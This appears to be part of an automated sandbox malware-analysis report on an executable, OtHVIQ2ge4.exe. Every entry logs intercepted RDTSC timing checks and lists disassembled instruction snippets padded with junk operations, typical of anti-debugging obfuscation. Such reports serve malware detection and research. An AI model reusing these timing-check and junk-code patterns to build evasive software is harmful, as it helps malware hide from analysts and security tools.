Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 80F26C second address: 80F272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 81547A second address: 81547E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 81547E second address: 81548E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628B6958Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 73D67D second address: 73D681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 81E874 second address: 81E87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 827CBE second address: 827CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 827CCB second address: 827CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 82697C second address: 82698F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Dh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 826C9D second address: 826CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 826CA3 second address: 826CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 8292D9 second address: 8292FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF628B69586h 0x00000008 jnp 00007FF628B69586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FF628B69591h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 8292FD second address: 82931D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 jmp 00007FF628D73F64h 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 82CEBC second address: 82CEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF628B69586h 0x0000000a jno 00007FF628B69586h 0x00000010 popad 0x00000011 push ecx 0x00000012 jmp 00007FF628B69593h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 82CEE3 second address: 82CEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FF628D73F56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 82CEF2 second address: 82CF00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jbe 00007FF628B69586h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 82CF00 second address: 82CF0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FF628D73F56h 0x00000009 pop edi 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 836429 second address: 836449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FF628B6958Eh 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 836449 second address: 836451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 83973F second address: 839743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 839743 second address: 839747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 84B4BD second address: 84B4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 84B1FA second address: 84B20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 js 00007FF628D73F62h 0x0000000d jno 00007FF628D73F56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 861F79 second address: 861F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 860D67 second address: 860D93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F64h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF628D73F62h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 860D93 second address: 860D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 860D99 second address: 860DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF628D73F56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 860F16 second address: 860F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628B69598h 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FF628B69586h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 861092 second address: 861098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 861098 second address: 86109E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 86123D second address: 861241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 861241 second address: 861246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 861246 second address: 861258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628D73F5Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 861669 second address: 86167F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FF628B6958Fh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 86167F second address: 8616BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF628D73F5Bh 0x00000010 ja 00007FF628D73F6Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 861C2E second address: 861C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 861C3C second address: 861C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF628D73F68h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 8660D5 second address: 8660DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 8664C3 second address: 866519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jbe 00007FF628D73F56h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 pop edx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007FF628D73F67h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF628D73F62h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 866519 second address: 866523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF628B69586h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 8679E2 second address: 8679F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF628D73F5Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 869950 second address: 86998C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF628B69599h 0x0000000b jmp 00007FF628B6958Bh 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FF628B6958Bh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 86998C second address: 869999 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 869999 second address: 8699BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FF628B69586h 0x00000010 jmp 00007FF628B69592h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 781DA4 second address: 781DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 781DA8 second address: 781DC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF628B69599h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 781DC9 second address: 781DF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d jmp 00007FF628D73F5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 547025F second address: 5470263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 5470263 second address: 5470267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 5470267 second address: 54702A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF628B6958Dh 0x0000000c add esi, 5E3BF9E6h 0x00000012 jmp 00007FF628B69591h 0x00000017 popfd 0x00000018 popad 0x00000019 mov ecx, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF628B6958Dh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 54702A6 second address: 54702B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 54702C9 second address: 54702E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 54905F4 second address: 5490668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, cx 0x00000007 popad 0x00000008 push ecx 0x00000009 pushfd 0x0000000a jmp 00007FF628D73F65h 0x0000000f add si, 8FB6h 0x00000014 jmp 00007FF628D73F61h 0x00000019 popfd 0x0000001a pop eax 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e mov bl, al 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FF628D73F62h 0x00000027 xor esi, 04F34208h 0x0000002d jmp 00007FF628D73F5Bh 0x00000032 popfd 0x00000033 pop esi 0x00000034 popad 0x00000035 mov dword ptr [esp], ebp 0x00000038 pushad 0x00000039 movsx edi, cx 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490668 second address: 549066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 549066E second address: 5490690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490690 second address: 5490694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490694 second address: 5490698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490698 second address: 549069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 549069E second address: 54906BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF628D73F5Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54906BD second address: 54906C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54906C3 second address: 5490701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF628D73F5Fh 0x00000010 and ax, 926Eh 0x00000015 jmp 00007FF628D73F69h 0x0000001a popfd 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490701 second address: 5490782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 jmp 00007FF628B69598h 0x0000000c push eax 0x0000000d pushad 0x0000000e mov ebx, 434296C4h 0x00000013 mov esi, edx 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF628B69591h 0x0000001e and eax, 4EEA5AB6h 0x00000024 jmp 00007FF628B69591h 0x00000029 popfd 0x0000002a popad 0x0000002b lea eax, dword ptr [ebp-04h] 0x0000002e jmp 00007FF628B6958Eh 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FF628B69597h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490782 second address: 5490796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, 65B65038h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov dx, ax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490796 second address: 54907D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, dx 0x0000000c popad 0x0000000d nop 0x0000000e jmp 00007FF628B6958Dh 0x00000013 push dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF628B6958Dh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54907F4 second address: 5490854 instructions: 0x00000000 rdtsc 0x00000002 mov cl, 7Eh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF628D73F5Bh 0x0000000c and ecx, 36533D6Eh 0x00000012 jmp 00007FF628D73F69h 0x00000017 popfd 0x00000018 popad 0x00000019 cmp dword ptr [ebp-04h], 00000000h 0x0000001d jmp 00007FF628D73F5Eh 0x00000022 mov esi, eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FF628D73F67h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490854 second address: 5490886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 37F3793Ah 0x00000008 push ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FF628B69606h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007FF628B69596h 0x0000001b pop eax 0x0000001c mov di, 6866h 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490902 second address: 5490908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490908 second address: 549090C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 549090C second address: 5490920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, si 0x0000000f mov ax, E94Bh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490920 second address: 5490926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5490926 second address: 5480011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 jmp 00007FF628D73F5Fh 0x0000000e retn 0004h 0x00000011 nop 0x00000012 cmp eax, 00000000h 0x00000015 setne al 0x00000018 jmp 00007FF628D73F52h 0x0000001a xor ebx, ebx 0x0000001c test al, 01h 0x0000001e jne 00007FF628D73F57h 0x00000020 sub esp, 04h 0x00000023 mov dword ptr [esp], 0000000Dh 0x0000002a call 00007FF62DC5154Bh 0x0000002f mov edi, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FF628D73F5Dh 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480011 second address: 5480021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628B6958Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480021 second address: 5480071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a movzx eax, di 0x0000000d mov esi, edx 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 jmp 00007FF628D73F61h 0x00000018 mov ebp, esp 0x0000001a jmp 00007FF628D73F5Eh 0x0000001f sub esp, 2Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF628D73F67h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480071 second address: 54800ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ax, 8B37h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f call 00007FF628B69598h 0x00000014 pop ecx 0x00000015 call 00007FF628B69597h 0x0000001a mov si, F6FFh 0x0000001e pop ecx 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FF628B69590h 0x00000028 jmp 00007FF628B69595h 0x0000002d popfd 0x0000002e push ecx 0x0000002f mov di, 1FE2h 0x00000033 pop edx 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54800ED second address: 54800F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54800F1 second address: 548010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548010C second address: 5480157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF628D73F5Fh 0x00000009 and esi, 354E6E3Eh 0x0000000f jmp 00007FF628D73F69h 0x00000014 popfd 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF628D73F5Fh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480157 second address: 548015D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 548015D second address: 5480161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5480197 second address: 54801BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF628B69592h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 54801BC second address: 5480217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 16209C04h 0x00000008 pushfd 0x00000009 jmp 00007FF628D73F5Dh 0x0000000e or ecx, 210EE746h 0x00000014 jmp 00007FF628D73F61h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d inc ebx 0x0000001e jmp 00007FF628D73F5Eh 0x00000023 test al, al 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF628D73F67h 0x0000002c rdtsc
